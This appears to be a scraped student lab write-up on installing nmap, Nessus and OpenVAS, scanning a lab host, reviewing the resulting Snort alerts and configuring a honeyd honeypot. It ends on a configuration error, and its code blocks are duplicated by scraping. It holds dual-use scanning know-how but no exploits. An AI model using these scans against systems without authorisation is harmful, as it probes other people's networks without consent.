Penetration Testing : Applications
来源:互联网 发布:古典音乐音响知乎 编辑:程序博客网 时间:2024/04/29 21:08
http://www.dis9.com/penetration-testing-applications.html
Installing:
1
sudo apt-get install nmap nessus openvas-server openvas-client
sudo apt-get install nmap nessus openvas-server openvas-client
We could not scan a thing if we were trying to nmap from the Xen server. So we configured a default gw on the VM:
1
route add default gw 145.100.105.193
route add default gw 145.100.105.193
At this moment our system was unprotected to the outside, so we added some rules to the iptables firewall:
123
iptables -A INPUT -s 145.100.105.193 -j ACCEPTiptables -A INPUT -s 145.100.102.131 -j ACCEPTiptables -I INPUT 3 -j DROP
iptables -A INPUT -s 145.100.105.193 -j ACCEPTiptables -A INPUT -s 145.100.102.131 -j ACCEPTiptables -I INPUT 3 -j DROP
On our workstation it was now possible to scan for open ports:
1234567891011
sudo nmap 145.100.105.196 Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-01 13:47 CESTInteresting ports on 145.100.105.196:Not shown: 997 closed portsPORT STATE SERVICE22/tcp open ssh111/tcp open rpcbind631/tcp open ipp Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds
sudo nmap 145.100.105.196 Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-01 13:47 CESTInteresting ports on 145.100.105.196:Not shown: 997 closed portsPORT STATE SERVICE22/tcp open ssh111/tcp open rpcbind631/tcp open ippNmap done: 1 IP address (1 host up) scanned in 13.56 seconds
In the snort log (/var/log/snort/alert) we saw the following entries:
123456789101112131415161718192021222324252627
[**] [1:469:3] ICMP PING NMAP [**][Classification: Attempted Information Leak] [Priority: 2]04/01-13:47:31.348379 145.100.102.131 -> 145.100.105.196ICMP TTL:44 TOS:0x0 ID:31604 IpLen:20 DgmLen:28Type:8 Code:0 ID:12876 Seq:0 ECHO[Xref => http://www.whitehats.com/info/IDS162] [**] [122:1:0] (portscan) TCP Portscan [**][Priority: 3]04/01-13:47:44.360634 145.100.102.131 -> 145.100.105.196PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:168 DF [**] [1:1418:11] SNMP request tcp [**][Classification: Attempted Information Leak] [Priority: 2]04/01-13:47:44.396747 145.100.102.131:50051 -> 145.100.105.196:161TCP TTL:38 TOS:0x0 ID:58065 IpLen:20 DgmLen:44******S* Seq: 0xF21581F9 Ack: 0x0 Win: 0x1000 TcpLen: 24TCP Options (1) => MSS: 1460[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088] [**] [1:1421:11] SNMP AgentX/tcp request [**][Classification: Attempted Information Leak] [Priority: 2]04/01-13:47:44.494539 145.100.102.131:50051 -> 145.100.105.196:705TCP TTL:37 TOS:0x0 ID:45833 IpLen:20 DgmLen:44******S* Seq: 0xF21581F9 Ack: 0x0 Win: 0xC00 TcpLen: 24TCP Options (1) => MSS: 1460[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]
[**] [1:469:3] ICMP PING NMAP [**][Classification: Attempted Information Leak] [Priority: 2]04/01-13:47:31.348379 145.100.102.131 -> 145.100.105.196ICMP TTL:44 TOS:0x0 ID:31604 IpLen:20 DgmLen:28Type:8 Code:0 ID:12876 Seq:0 ECHO[Xref => http://www.whitehats.com/info/IDS162][**] [122:1:0] (portscan) TCP Portscan [**][Priority: 3]04/01-13:47:44.360634 145.100.102.131 -> 145.100.105.196PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:168 DF[**] [1:1418:11] SNMP request tcp [**][Classification: Attempted Information Leak] [Priority: 2]04/01-13:47:44.396747 145.100.102.131:50051 -> 145.100.105.196:161TCP TTL:38 TOS:0x0 ID:58065 IpLen:20 DgmLen:44******S* Seq: 0xF21581F9 Ack: 0x0 Win: 0x1000 TcpLen: 24TCP Options (1) => MSS: 1460[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088][**] [1:1421:11] SNMP AgentX/tcp request [**][Classification: Attempted Information Leak] [Priority: 2]04/01-13:47:44.494539 145.100.102.131:50051 -> 145.100.105.196:705TCP TTL:37 TOS:0x0 ID:45833 IpLen:20 DgmLen:44******S* Seq: 0xF21581F9 Ack: 0x0 Win: 0xC00 TcpLen: 24TCP Options (1) => MSS: 1460[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]
So snort detected the Nmap portscan.
After installing nessus via aptitude we had to add a nessus user:
12345678910111213141516171819202122
/opt/nessus/sbin/nessus-adduserLogin : jeroenLogin password :Login password (again) :Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: yUser rules----------nessusd has a rules system which allows you to restrict the hoststhat jeroen has the right to test. For instance, you may wanthim to be able to scan his own host only. Please see the nessus-adduser manual for the rules syntax Enter the rules for this user, and enter a BLANK LINE once you are done :(the user can have an empty rules set) Login : jeroenPassword : ***********This user will have 'admin' privileges within the Nessus serverRules :Is that ok ? (y/n) [y] yUser added
/opt/nessus/sbin/nessus-adduserLogin : jeroenLogin password :Login password (again) :Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: yUser rules----------nessusd has a rules system which allows you to restrict the hoststhat jeroen has the right to test. For instance, you may wanthim to be able to scan his own host only.Please see the nessus-adduser manual for the rules syntaxEnter the rules for this user, and enter a BLANK LINE once you are done :(the user can have an empty rules set)Login : jeroenPassword : ***********This user will have 'admin' privileges within the Nessus serverRules :Is that ok ? (y/n) [y] yUser added
The following step is to start nessus:
12345
/etc/init.d/nessusd start Missing plugins. Attempting a plugin update...Your installation is missing plugins. Please register and try again.To register, please visit http://www.nessus.org/register/
/etc/init.d/nessusd startMissing plugins. Attempting a plugin update...Your installation is missing plugins. Please register and try again.To register, please visit http://www.nessus.org/register/
We registered on the website that was given and a mail with the activation key was sent to us. We registered using the following command:
1234567
/opt/nessus/bin/nessus-fetch --register ****-****-****-****-**** Your activation code has been registered properly - thank you.Now fetching the newest plugin set from plugins.nessus.org...Your Nessus installation is now up-to-date.If auto_update is set to 'yes' in nessusd.conf, Nessus willupdate the plugins by itself.
/opt/nessus/bin/nessus-fetch --register ****-****-****-****-****Your activation code has been registered properly - thank you.Now fetching the newest plugin set from plugins.nessus.org...Your Nessus installation is now up-to-date.If auto_update is set to 'yes' in nessusd.conf, Nessus willupdate the plugins by itself.
After this process I tried to start nessus again:
1
/etc/init.d/nessusd start
/etc/init.d/nessusd start
No errors were given, so we could start the scan:
12345678910
/opt/nessus/bin/nessuscmd 145.100.105.196 Starting nessuscmd 4.2.1Scanning '145.100.105.196'... + Results found on 145.100.105.196 : - Port ssh (22/tcp) is open - Port sunrpc (111/tcp) is open - Port ipp (631/tcp) is open - Port postgresql (5432/tcp) is open
/opt/nessus/bin/nessuscmd 145.100.105.196Starting nessuscmd 4.2.1Scanning '145.100.105.196'...+ Results found on 145.100.105.196 : - Port ssh (22/tcp) is open - Port sunrpc (111/tcp) is open - Port ipp (631/tcp) is open - Port postgresql (5432/tcp) is open
We got the following records in the snort log:
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667
[**] [122:17:0] (portscan) UDP Portscan [**][Priority: 3]04/01-14:31:15.612342 145.100.96.11 -> 145.100.104.21PROTO:255 TTL:0 TOS:0xC0 ID:34166 IpLen:20 DgmLen:166 [**] [122:3:0] (portscan) TCP Portsweep [**][Priority: 3]04/01-14:31:27.040300 145.100.102.131 -> 145.100.105.196PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:168 DF [**] [122:1:0] (portscan) TCP Portscan [**][Priority: 3]04/01-14:31:27.040300 145.100.102.131 -> 145.100.105.196PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:167 DF [**] [1:1418:11] SNMP request tcp [**][Classification: Attempted Information Leak] [Priority: 2]04/01-14:31:32.044917 145.100.102.131:56958 -> 145.100.105.196:161TCP TTL:63 TOS:0x4 ID:43162 IpLen:20 DgmLen:60 DF******S* Seq: 0x7AEF1E8D Ack: 0x0 Win: 0x16D0 TcpLen: 40TCP Options (5) => MSS: 1460 SackOK TS: 4044311 0 NOP WS: 6[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088] [**] [1:1420:11] SNMP trap tcp [**][Classification: Attempted Information Leak] [Priority: 2]04/01-14:31:37.378486 145.100.102.131:35607 -> 145.100.105.196:162TCP TTL:63 TOS:0x4 ID:14118 IpLen:20 DgmLen:60 DF******S* Seq: 0x7F2B8C6A Ack: 0x0 Win: 0x16D0 TcpLen: 40TCP Options (5) => MSS: 1460 SackOK TS: 4045644 0 NOP WS: 6[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/fcgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088] [**] [1:1421:11] SNMP AgentX/tcp request [**][Classification: Attempted Information Leak] [Priority: 2]04/01-14:31:37.455136 145.100.102.131:51747 -> 145.100.105.196:705TCP TTL:63 TOS:0x4 ID:50450 IpLen:20 DgmLen:60 DF******S* Seq: 0x7F3E7E72 Ack: 0x0 Win: 0x16D0 TcpLen: 40TCP Options (5) => MSS: 1460 SackOK TS: 4045664 0 NOP WS: 6[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088] [**] [1:249:8] DDOS mstream client to handler [**][Classification: Attempted Denial of Service] [Priority: 2]04/01-14:31:40.803471 145.100.102.131:34168 -> 145.100.105.196:15104TCP TTL:63 TOS:0x4 ID:53980 IpLen:20 DgmLen:60 DF******S* Seq: 0x82C26C79 Ack: 0x0 Win: 0x16D0 TcpLen: 40TCP Options (5) => MSS: 1460 SackOK TS: 4046501 0 NOP WS: 6[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0138][Xref => http://www.whitehats.com/info/IDS111] [**] [122:1:0] (portscan) TCP Portscan [**][Priority: 3]04/01-14:31:44.216729 145.100.102.131 -> 145.100.105.196PROTO:255 TTL:0 TOS:0x4 ID:0 IpLen:20 DgmLen:168 DF [**] [1:1421:11] SNMP AgentX/tcp request [**][Classification: Attempted Information Leak] [Priority: 2]04/01-14:31:47.298076 145.100.102.131:55336 -> 145.100.105.196:705TCP TTL:63 TOS:0x4 ID:49082 IpLen:20 DgmLen:60 DF******S* Seq: 0x88EF7B46 Ack: 0x0 Win: 0x16D0 TcpLen: 40TCP Options (5) => MSS: 1460 SackOK TS: 4048124 0 NOP WS: 6[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088] [**] [1:1420:11] SNMP trap tcp [**][Classification: Attempted Information Leak] [Priority: 2]04/01-14:31:47.750283 145.100.102.131:40739 -> 145.100.105.196:162TCP TTL:63 TOS:0x4 ID:10439 IpLen:20 DgmLen:60 DF******S* Seq: 0x8907EDAA Ack: 0x0 Win: 0x16D0 TcpLen: 40TCP Options (5) => MSS: 1460 SackOK TS: 4048237 0 NOP WS: 6[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]
[**] [122:17:0] (portscan) UDP Portscan [**][Priority: 3]04/01-14:31:15.612342 145.100.96.11 -> 145.100.104.21PROTO:255 TTL:0 TOS:0xC0 ID:34166 IpLen:20 DgmLen:166[**] [122:3:0] (portscan) TCP Portsweep [**][Priority: 3]04/01-14:31:27.040300 145.100.102.131 -> 145.100.105.196PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:168 DF[**] [122:1:0] (portscan) TCP Portscan [**][Priority: 3]04/01-14:31:27.040300 145.100.102.131 -> 145.100.105.196PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:167 DF[**] [1:1418:11] SNMP request tcp [**][Classification: Attempted Information Leak] [Priority: 2]04/01-14:31:32.044917 145.100.102.131:56958 -> 145.100.105.196:161TCP TTL:63 TOS:0x4 ID:43162 IpLen:20 DgmLen:60 DF******S* Seq: 0x7AEF1E8D Ack: 0x0 Win: 0x16D0 TcpLen: 40TCP Options (5) => MSS: 1460 SackOK TS: 4044311 0 NOP WS: 6[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088][**] [1:1420:11] SNMP trap tcp [**][Classification: Attempted Information Leak] [Priority: 2]04/01-14:31:37.378486 145.100.102.131:35607 -> 145.100.105.196:162TCP TTL:63 TOS:0x4 ID:14118 IpLen:20 DgmLen:60 DF******S* Seq: 0x7F2B8C6A Ack: 0x0 Win: 0x16D0 TcpLen: 40TCP Options (5) => MSS: 1460 SackOK TS: 4045644 0 NOP WS: 6[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/fcgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088][**] [1:1421:11] SNMP AgentX/tcp request [**][Classification: Attempted Information Leak] [Priority: 2]04/01-14:31:37.455136 145.100.102.131:51747 -> 145.100.105.196:705TCP TTL:63 TOS:0x4 ID:50450 IpLen:20 DgmLen:60 DF******S* Seq: 0x7F3E7E72 Ack: 0x0 Win: 0x16D0 TcpLen: 40TCP Options (5) => MSS: 1460 SackOK TS: 4045664 0 NOP WS: 6[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088][**] [1:249:8] DDOS mstream client to handler [**][Classification: Attempted Denial of Service] [Priority: 2]04/01-14:31:40.803471 145.100.102.131:34168 -> 145.100.105.196:15104TCP TTL:63 TOS:0x4 ID:53980 IpLen:20 DgmLen:60 DF******S* Seq: 0x82C26C79 Ack: 0x0 Win: 0x16D0 TcpLen: 40TCP Options (5) => MSS: 1460 SackOK TS: 4046501 0 NOP WS: 6[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0138][Xref => http://www.whitehats.com/info/IDS111][**] [122:1:0] (portscan) TCP Portscan [**][Priority: 3]04/01-14:31:44.216729 145.100.102.131 -> 145.100.105.196PROTO:255 TTL:0 TOS:0x4 ID:0 IpLen:20 DgmLen:168 DF[**] [1:1421:11] SNMP AgentX/tcp request [**][Classification: Attempted Information Leak] [Priority: 2]04/01-14:31:47.298076 145.100.102.131:55336 -> 145.100.105.196:705TCP TTL:63 TOS:0x4 ID:49082 IpLen:20 DgmLen:60 DF******S* Seq: 0x88EF7B46 Ack: 0x0 Win: 0x16D0 TcpLen: 40TCP Options (5) => MSS: 1460 SackOK TS: 4048124 0 NOP WS: 6[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088][**] [1:1420:11] SNMP trap tcp [**][Classification: Attempted Information Leak] [Priority: 2]04/01-14:31:47.750283 145.100.102.131:40739 -> 145.100.105.196:162TCP TTL:63 TOS:0x4 ID:10439 IpLen:20 DgmLen:60 DF******S* Seq: 0x8907EDAA Ack: 0x0 Win: 0x16D0 TcpLen: 40TCP Options (5) => MSS: 1460 SackOK TS: 4048237 0 NOP WS: 6[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]
Installing OpenVAS was a bit more complicated. Installing from the repository was not possible because of an error in the package. We installed it from source. We took the newest version and tried to install it:
12
wget http://wald.intevation.org/frs/download.php/724/openvas-scanner-3.0.2.tar.gz./configure
wget http://wald.intevation.org/frs/download.php/724/openvas-scanner-3.0.2.tar.gz./configure
This resulted in an error. It had a few dependencies and needed the openVAS libraries, so I downloaded these:
123
wget http://wald.intevation.org/frs/download.php/717/openvas-libraries-3.0.4.tar.gz./configureconfigure: error: "glib >= 2.12.0 not found"
wget http://wald.intevation.org/frs/download.php/717/openvas-libraries-3.0.4.tar.gz./configureconfigure: error: "glib >= 2.12.0 not found"
Another dependency… I searched for packages in the repository that included glib:
1
apt-file search glib
apt-file search glib
The packages that included glib were max. version 2.7, so we decided to install a slightly older version. We had a lot of help from this website:http://wikisecure.net/security/how-to-install-openvas-ubuntu9 First we made some preparations:
1234567
sudo apt-get updatesudo apt-get install build-essential libgtk2.0-dev libglib2.0-dev libssl-dev htmldoc libgnutls-dev libpcap0.8-dev bison libgpgme11-dev libsmbclient-dev snmp pnscansudo updatedbsudo ldconfigcd /home/user/Desktopmkdir OpenVAScd OpenVAS
sudo apt-get updatesudo apt-get install build-essential libgtk2.0-dev libglib2.0-dev libssl-dev htmldoc libgnutls-dev libpcap0.8-dev bison libgpgme11-dev libsmbclient-dev snmp pnscansudo updatedbsudo ldconfigcd /home/user/Desktopmkdir OpenVAScd OpenVAS
After this we downloaded the openVAS libraries, scanner and client and extracted them:
123456
wget -c http://wald.intevation.org/frs/download.php/683/openvas-libraries-3.0.0.tar.gzwget -c http://wald.intevation.org/frs/download.php/684/openvas-scanner-3.0.0.tar.gzwget -c http://wald.intevation.org/frs/download.php/685/openvas-client-3.0.0.tar.gzsudo tar -zxvf openvas-libraries-3.0.0.tar.gzsudo tar -zxvf openvas-scanner-3.0.0.tar.gzsudo tar -zxvf openvas-client-3.0.0.tar.gz
wget -c http://wald.intevation.org/frs/download.php/683/openvas-libraries-3.0.0.tar.gzwget -c http://wald.intevation.org/frs/download.php/684/openvas-scanner-3.0.0.tar.gzwget -c http://wald.intevation.org/frs/download.php/685/openvas-client-3.0.0.tar.gzsudo tar -zxvf openvas-libraries-3.0.0.tar.gzsudo tar -zxvf openvas-scanner-3.0.0.tar.gzsudo tar -zxvf openvas-client-3.0.0.tar.gz
Installing OpenVAS Libraries:
123456
cd openvas-libraries-3.0.0sudo ./configuresudo apt-get install cmakesudo makesudo make installsudo ldconfig
cd openvas-libraries-3.0.0sudo ./configuresudo apt-get install cmakesudo makesudo make installsudo ldconfig
Installing OpenVAS Scanner daemons:
1234
cd ../scanner-3.0.0sudo ./configuresudo makesudo make install
cd ../scanner-3.0.0sudo ./configuresudo makesudo make install
Installing OpenVAS Client GUI:
123456
cd ../openvas-client-3.0.0sudo ./configuresudo makesudo make installsudo updatedbsudo ldconfig
cd ../openvas-client-3.0.0sudo ./configuresudo makesudo make installsudo updatedbsudo ldconfig
Next, we generated a certificate:
123456789101112131415161718192021222324252627282930313233
sudo openvas-mkcert------------------------------------------------------------------------------- Creation of the OpenVAS SSL Certificate------------------------------------------------------------------------------- This script will now ask you the relevant information to create the SSL certificate of OpenVAS.Note that this information will *NOT* be sent to anybody (everything stays local), but anyone with the ability to connect to your OpenVAS daemon will be able to retrieve this information. CA certificate life time in days [1460]:Server certificate life time in days [365]:Your country (two letter code) [US]: NLYour state or province name [none]: Noord-HollandYour location (e.g. town) [Berlin]: AmsterdamYour organization [OpenVAS Users United]: ------------------------------------------------------------------------------- Creation of the OpenVAS SSL Certificate------------------------------------------------------------------------------- Congratulations. Your server certificate was properly created. /usr/local/etc/openvas/openvassd.conf updatedThe following files were created: . Certification authority: Certificate = /usr/local/var/lib/openvas/CA/cacert.pem Private key = /usr/local/var/lib/openvas/private/CA/cakey.pem . OpenVAS Server : Certificate = /usr/local/var/lib/openvas/CA/servercert.pem Private key = /usr/local/var/lib/openvas/private/CA/serverkey.pem Press [ENTER] to exit
sudo openvas-mkcert-------------------------------------------------------------------------------Creation of the OpenVAS SSL Certificate-------------------------------------------------------------------------------This script will now ask you the relevant information to create the SSL certificate of OpenVAS.Note that this information will *NOT* be sent to anybody (everything stays local), but anyone with the ability to connect to your OpenVAS daemon will be able to retrieve this information.CA certificate life time in days [1460]:Server certificate life time in days [365]:Your country (two letter code) [US]: NLYour state or province name [none]: Noord-HollandYour location (e.g. town) [Berlin]: AmsterdamYour organization [OpenVAS Users United]: -------------------------------------------------------------------------------Creation of the OpenVAS SSL Certificate-------------------------------------------------------------------------------Congratulations. Your server certificate was properly created./usr/local/etc/openvas/openvassd.conf updatedThe following files were created:. Certification authority: Certificate = /usr/local/var/lib/openvas/CA/cacert.pem Private key = /usr/local/var/lib/openvas/private/CA/cakey.pem. OpenVAS Server : Certificate = /usr/local/var/lib/openvas/CA/servercert.pem Private key = /usr/local/var/lib/openvas/private/CA/serverkey.pemPress [ENTER] to exit
Eventually we added an openVAS use:
1234567891011121314151617181920212223242526272829303132333435363738394041
sudo openvas-adduserCreate user account for OpenVAS Client. [It will be used to login to OpenVAS Client] Using /var/tmp as a temporary file holder. Add a new openvassd user--------------------------------- Login : jeroenAuthentication (pass/cert) [pass] :Login password :Login password (again) : User rules---------------openvassd has a rules system which allows you to restrict the hosts that jeroen has the right to test.For instance, you may want him to be able to scan his own host only. Please see the openvas-adduser(8) man page for the rules syntax. Enter the rules for this user, and hit ctrl-D once you are done:(the user can have an empty rules set) User rules---------------openvassd has a rules system which allows you to restrict the hosts that jeroen has the right to test.For instance, you may want him to be able to scan his own host only. Please see the openvas-adduser(8) man page for the rules syntax. Enter the rules for this user, and hit ctrl-D once you are done:(the user can have an empty rules set) Login : jeroenPassword : *********** Rules : Is that ok? (y/n) [y] user added.
sudo openvas-adduserCreate user account for OpenVAS Client. [It will be used to login to OpenVAS Client]Using /var/tmp as a temporary file holder.Add a new openvassd user---------------------------------Login : jeroenAuthentication (pass/cert) [pass] :Login password :Login password (again) : User rules---------------openvassd has a rules system which allows you to restrict the hosts that jeroen has the right to test.For instance, you may want him to be able to scan his own host only.Please see the openvas-adduser(8) man page for the rules syntax.Enter the rules for this user, and hit ctrl-D once you are done:(the user can have an empty rules set)User rules---------------openvassd has a rules system which allows you to restrict the hosts that jeroen has the right to test.For instance, you may want him to be able to scan his own host only.Please see the openvas-adduser(8) man page for the rules syntax.Enter the rules for this user, and hit ctrl-D once you are done:(the user can have an empty rules set)Login : jeroenPassword : ***********Rules : Is that ok? (y/n) [y] user added.
Updating the Openvas Plugins folder (/usr/local/lib/openvas/plugins) with the latest set of plugins.
1
sudo openvas-nvt-sync
sudo openvas-nvt-sync
Start openVAS:
1
sudo openvassd
sudo openvassd
After this you have to enter the IP address or a list of IP addresses of the host(s) you want to scan in a text file:
1
echo "145.100.105.196" >> iptoscan.txt
echo "145.100.105.196" >> iptoscan.txt
To scan the ip addresses we executed the following command:
12345678
OpenVAS-Client -q 127.0.0.1 9390 jeroen ******** iptoscan.txt scanresults.html -T htmlPlease choose your level of SSL paranoia (Hint: if you want to managemany servers from your client, choose 2. Otherwise, choose 1. Or 3,if you are paranoid.2*** Warning: paranoia_level=2 but "trusted_ca" file not found:cacert.pem*** Info: Found and enabled 16709 new plugins.
OpenVAS-Client -q 127.0.0.1 9390 jeroen ******** iptoscan.txt scanresults.html -T htmlPlease choose your level of SSL paranoia (Hint: if you want to managemany servers from your client, choose 2. Otherwise, choose 1. Or 3,if you are paranoid.2*** Warning: paranoia_level=2 but "trusted_ca" file not found:cacert.pem*** Info: Found and enabled 16709 new plugins.
The output of the scan will be saved in scanresults.html:
- Honey pots:
- Setup a honey pot of choice (e.g. honeyd) in a VM (new or existing VM, your choice).
- Configure it to act like a vulnerable system.
- Run at least three services.
We used the following configuration file to create a VM for the honeypot:
123456789101112131415161718192021222324
import os, rearch = os.uname()[4]if re.search('64', arch): arch_libdir = 'lib64'else: arch_libdir = 'lib' kernel = "/usr/lib/xen/boot/hvmloader"builder='hvm' memory = 256name = "ubuntu-desktop"builde='hvm'dhcp = "dhcp"vif = [ 'bridge=eth2, mac=00:16:3e:59:34:7d' ]disk = [ 'file:/home/jeroen/ids/disk1.img,hda,w', 'file:/home/jeroen/inr/isos/ubuntu-9.10-desktop-i386.iso,hdc:cdrom,r' ]#disk = [ 'file:/home/jeroen/inr/hvm/ubuntu9.10.img,hda,w', ]device_model = '/usr/' + arch_libdir + '/xen/bin/qemu-dm'stdvga=0sdl=0vnc=1vncviewer=1boot = 'cd'serial='pty'
import os, rearch = os.uname()[4]if re.search('64', arch): arch_libdir = 'lib64'else: arch_libdir = 'lib'kernel = "/usr/lib/xen/boot/hvmloader"builder='hvm'memory = 256name = "ubuntu-desktop"builde='hvm'dhcp = "dhcp"vif = [ 'bridge=eth2, mac=00:16:3e:59:34:7d' ]disk = [ 'file:/home/jeroen/ids/disk1.img,hda,w', 'file:/home/jeroen/inr/isos/ubuntu-9.10-desktop-i386.iso,hdc:cdrom,r' ]#disk = [ 'file:/home/jeroen/inr/hvm/ubuntu9.10.img,hda,w', ]device_model = '/usr/' + arch_libdir + '/xen/bin/qemu-dm'stdvga=0sdl=0vnc=1vncviewer=1boot = 'cd'serial='pty'We created an image of 3GB:
1
dd if=/dev/zero of=disk1.img count=0 seek=3G
dd if=/dev/zero of=disk1.img count=0 seek=3G
And made created the VM:
1
xm create xenhoney.cfgxm create xenhoney.cfg
Then we installed honeyd:
1
sudo apt-get install honeydsudo apt-get install honeyd
First of all, the honeyd should reply on arp requests which are destined for the virtual servers that honeyd created. We will use farpd for this, which is already installed by default on Ubuntu. Here for we modified /etc/default/farpd:
12
INTERFACE="eth0"NETWORK="145.100.105.192/27"
INTERFACE="eth0"NETWORK="145.100.105.192/27"
This means that farpd will listen to interface eth0 for incoming arp requests and handle the arp request of the network 145.100.105.192/27. After this step the daemon needs to be restarted:
1234
/etc/init.d/farpd restart* Restarting Fake-arpd daemon farpdarpd[30280]: listening on eth0: arp and (dst net 145.100.105.192/27) and not ether src 00:16:3e:59:34:7d [ OK ]
/etc/init.d/farpd restart* Restarting Fake-arpd daemon farpdarpd[30280]: listening on eth0: arp and (dst net 145.100.105.192/27) and not ether src 00:16:3e:59:34:7d [ OK ]
Next, we had to modify the honeyd config file:
123
RUN="yes"INTERFACE="eth0"NETWORK=145.100.105.196
RUN="yes"INTERFACE="eth0"NETWORK=145.100.105.196
Eventually we can start the daemon:
12
/etc/init.d/honeyd start * Starting Honeyd daemon honeyd [ OK ]
/etc/init.d/honeyd start * Starting Honeyd daemon honeyd [ OK ]
Next thing to do is to create a fake system:
1234567891011121314
vim /etc/honeypot/myfakemachine.conf create windowsset windows personality "Microsoft Windows XP Professional"add windows tcp port 80 "sh scripts/web.sh"add windows tcp port 25 "perl scripts/snmp/fake-snmp.pl"add windows tcp port 23 "perl scripts/telnet/faketelnet.pl"add windows tcp port 139 openadd windows tcp port 137 openadd windows udp port 137 openadd windows udp port 135 openset windows default tcp action resetset windows default udp action resetbind 145.100.105.197 windows
vim /etc/honeypot/myfakemachine.confcreate windowsset windows personality "Microsoft Windows XP Professional"add windows tcp port 80 "sh scripts/web.sh"add windows tcp port 25 "perl scripts/snmp/fake-snmp.pl"add windows tcp port 23 "perl scripts/telnet/faketelnet.pl"add windows tcp port 139 openadd windows tcp port 137 openadd windows udp port 137 openadd windows udp port 135 openset windows default tcp action resetset windows default udp action resetbind 145.100.105.197 windows
When I tried to start the fake system, I got the following error:
1234567
sudo honeyd -f /etc/honeypot/myfakemachine.conf 145.100.105.197 Honeyd V1.5c Copyright (c) 2002-2007 Niels Provoshoneyd[30337]: started with -f /etc/honeypot/myfakemachine.conf 145.100.105.197honeyd[30337]: listening promiscuously on eth0: (arp or ip proto 47 or (udp and src port 67 and dst port 68) or (ip )) and not ether src 00:16:3e:59:34:7d/etc/honeypot/honeyd.conf:2: Unknown personality "Windows NT 4.0 Server SP5-SP6"honeyd: parsing configuration file failed
